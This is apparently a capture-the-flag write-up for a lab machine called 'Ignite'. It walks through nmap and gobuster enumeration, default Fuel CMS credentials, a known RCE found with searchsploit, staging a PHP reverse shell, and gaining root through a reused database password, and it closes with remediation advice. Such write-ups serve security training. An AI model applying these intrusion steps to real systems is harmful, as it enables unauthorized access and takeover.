[Linux] Ignite

Reconnaissance

sudo nmap 10.10.2.133
sudo nmap -A -p 80 10.10.2.133

Enumeration

HTTP

The last nmap scan shows the robots.txt file contains a Disallow entry for the webpage /fuel.

We can enumerate subpages with gobuster.

gobuster dir -u http://10.10.2.133/ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.10.2.133/fuel -w /usr/share/wordlists/dirb/common.txt

At the webpages /home, /0, /index, and /index.php, we obtain valid credentials for the login page at /fuel. However, the pages /offline and /assets are inaccessible. The robots.txt file confirms what was discovered during the Nmap scan.

The default password has not yet been changed.

We're unable to upload a PHP file to obtain a web shell or reverse shell. Since Fuel is a CMS, we can investigate known vulnerabilities associated with it to find potential exploits.

Vulnerabilities research

searchsploit fuel

Our fuel version is 1.4 so it is vulnerable to RCE attack.

Initial access

We can attempt to exploit the Remote Code Execution (RCE) vulnerabilities in Fuel CMS. By leveraging this vulnerability, we may be able to execute commands remotely and establish a reverse shell for deeper access to the system. We get the user flag at /home/www-data.

locate webshell
cp /usr/share/webshells/php/php-reverse-shell.php .

Escalation

Exploring the subdirectories, we discovered a database configuration file containing the root password. Fortunately, this root database password also serves as the root user’s Unix password, allowing us to gain root access to the system. The root flag is at /root.

Remediation

To enhance security:

• Replace default application passwords with strong, unique passwords for each account.

• Update the application to the latest version to patch known vulnerabilities.

• Avoid reusing passwords across different systems; the Unix password should differ from the database password to reduce the risk of credential compromise.